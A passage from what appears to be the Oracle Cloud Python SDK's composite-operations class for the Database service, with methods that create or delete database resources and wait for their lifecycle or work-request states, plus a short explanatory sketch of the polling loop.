to enter the given state(s).
:param oci.database.models.CreateExternalContainerDatabaseDetails create_external_container_database_details: (required)
Request to create a new external container database resource.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
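An illustrative sketch (the config profile, compartment OCID, and display name are placeholders; ``'AVAILABLE'`` is one valid ``ExternalContainerDatabase`` lifecycle state)::

    import oci

    client = oci.database.DatabaseClient(oci.config.from_file())
    composite = oci.database.DatabaseClientCompositeOperations(client)
    details = oci.database.models.CreateExternalContainerDatabaseDetails(
        compartment_id='ocid1.compartment.oc1..example',
        display_name='example-ecdb')
    result = composite.create_external_container_database_and_wait_for_state(
        details, wait_for_states=['AVAILABLE'])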
"""
operation_result = self.client.create_external_container_database(create_external_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_database_connector_and_wait_for_work_request(self, create_external_database_connector_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_database_connector` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateExternalDatabaseConnectorDetails create_external_database_connector_details: (required)
Request to create a connector to an external database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_database_connector`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_database_connector(create_external_database_connector_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_database_connector_and_wait_for_state(self, create_external_database_connector_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_database_connector` and waits for the :py:class:`~oci.database.models.ExternalDatabaseConnector` acted upon
to enter the given state(s).
:param oci.database.models.CreateExternalDatabaseConnectorDetails create_external_database_connector_details: (required)
Request to create a connector to an external database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalDatabaseConnector.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_database_connector`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_database_connector(create_external_database_connector_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_database_connector(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_non_container_database_and_wait_for_work_request(self, create_external_non_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_non_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateExternalNonContainerDatabaseDetails create_external_non_container_database_details: (required)
Request to create a new external non-container database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_non_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_non_container_database(create_external_non_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_non_container_database_and_wait_for_state(self, create_external_non_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_non_container_database` and waits for the :py:class:`~oci.database.models.ExternalNonContainerDatabase` acted upon
to enter the given state(s).
:param oci.database.models.CreateExternalNonContainerDatabaseDetails create_external_non_container_database_details: (required)
Request to create a new external non-container database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalNonContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_non_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_non_container_database(create_external_non_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_non_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_pluggable_database_and_wait_for_work_request(self, create_external_pluggable_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateExternalPluggableDatabaseDetails create_external_pluggable_database_details: (required)
Request to create a new external pluggable database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_pluggable_database(create_external_pluggable_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_external_pluggable_database_and_wait_for_state(self, create_external_pluggable_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_external_pluggable_database` and waits for the :py:class:`~oci.database.models.ExternalPluggableDatabase` acted upon
to enter the given state(s).
:param oci.database.models.CreateExternalPluggableDatabaseDetails create_external_pluggable_database_details: (required)
Request to create a new external pluggable database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExternalPluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_external_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_external_pluggable_database(create_external_pluggable_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_external_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_key_store_and_wait_for_state(self, create_key_store_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_key_store` and waits for the :py:class:`~oci.database.models.KeyStore` acted upon
to enter the given state(s).
:param oci.database.models.CreateKeyStoreDetails create_key_store_details: (required)
Request to create a new key store.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.KeyStore.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_key_store`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_key_store(create_key_store_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_key_store(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_pluggable_database_and_wait_for_work_request(self, create_pluggable_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreatePluggableDatabaseDetails create_pluggable_database_details: (required)
Request to create a pluggable database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_pluggable_database(create_pluggable_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_pluggable_database_and_wait_for_state(self, create_pluggable_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param oci.database.models.CreatePluggableDatabaseDetails create_pluggable_database_details: (required)
Request to create a pluggable database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_pluggable_database(create_pluggable_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_vm_cluster_and_wait_for_work_request(self, create_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateVmClusterDetails create_vm_cluster_details: (required)
Request to create a VM cluster. Applies to Exadata Cloud@Customer instances only.
See :func:`create_cloud_vm_cluster_details` for details on creating a cloud VM cluster in an Exadata Cloud Service instance.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_vm_cluster(create_vm_cluster_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_vm_cluster_and_wait_for_state(self, create_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_vm_cluster` and waits for the :py:class:`~oci.database.models.VmCluster` acted upon
to enter the given state(s).
:param oci.database.models.CreateVmClusterDetails create_vm_cluster_details: (required)
Request to create a VM cluster. Applies to Exadata Cloud@Customer instances only.
See :func:`create_cloud_vm_cluster_details` for details on creating a cloud VM cluster in an Exadata Cloud Service instance.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_vm_cluster(create_vm_cluster_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_vm_cluster_network_and_wait_for_work_request(self, exadata_infrastructure_id, vm_cluster_network_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_vm_cluster_network` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.VmClusterNetworkDetails vm_cluster_network_details: (required)
Request to create the Cloud@Customer VM cluster network.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_vm_cluster_network`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_vm_cluster_network_and_wait_for_state(self, exadata_infrastructure_id, vm_cluster_network_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_vm_cluster_network` and waits for the :py:class:`~oci.database.models.VmClusterNetwork` acted upon
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.VmClusterNetworkDetails vm_cluster_network_details: (required)
Request to create the Cloud@Customer VM cluster network.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmClusterNetwork.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_vm_cluster_network`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vm_cluster_network(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def db_node_action_and_wait_for_work_request(self, db_node_id, action, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.db_node_action` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str db_node_id: (required)
The database node `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str action: (required)
The action to perform on the DB Node.
Allowed values are: "STOP", "START", "SOFTRESET", "RESET"
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.db_node_action`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.db_node_action(db_node_id, action, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def db_node_action_and_wait_for_state(self, db_node_id, action, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.db_node_action` and waits for the :py:class:`~oci.database.models.DbNode` acted upon
to enter the given state(s).
:param str db_node_id: (required)
The database node `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str action: (required)
The action to perform on the DB Node.
Allowed values are: "STOP", "START", "SOFTRESET", "RESET"
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DbNode.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.db_node_action`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.db_node_action(db_node_id, action, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_db_node(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
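The ``waiter_kwargs`` these methods forward control how :py:func:`oci.wait_until` polls. A rough, deterministic sketch of the loop it implements under ``max_interval_seconds`` and ``max_wait_seconds`` (the real waiter sleeps between polls and inspects response objects; ``wait_until_sketch`` and the stand-in poller below are illustrative, not the SDK implementation):

```python
def wait_until_sketch(poll, is_done, max_interval_seconds=30, max_wait_seconds=600):
    """Poll with doubling backoff until is_done(result) or the time budget runs out.

    Simplified model of oci.wait_until: elapsed time is tracked instead of
    actually sleeping, so the sketch runs instantly and deterministically.
    """
    elapsed, interval = 0, 1
    while True:
        result = poll()
        if is_done(result):
            return result
        if elapsed >= max_wait_seconds:
            raise TimeoutError("resource did not reach the requested state in time")
        elapsed += interval                          # real waiter: time.sleep(interval)
        interval = min(interval * 2, max_interval_seconds)

# Stand-in poller: reaches a terminal status on the fourth call.
statuses = iter(["ACCEPTED", "IN_PROGRESS", "IN_PROGRESS", "SUCCEEDED"])
result = wait_until_sketch(lambda: next(statuses), lambda s: s == "SUCCEEDED")
print(result)  # SUCCEEDED
```

Raising ``max_interval_seconds`` spaces the retries out; lowering ``max_wait_seconds`` caps how long the composite operation blocks before giving up.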
def delete_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_autonomous_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_autonomous_vm_cluster_and_wait_for_work_request(self, autonomous_vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_autonomous_vm_cluster` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str autonomous_vm_cluster_id: (required)
The autonomous VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_autonomous_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_autonomous_vm_cluster(autonomous_vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_backup_and_wait_for_work_request(self, backup_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_backup` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str backup_id: (required)
The backup `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_backup`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
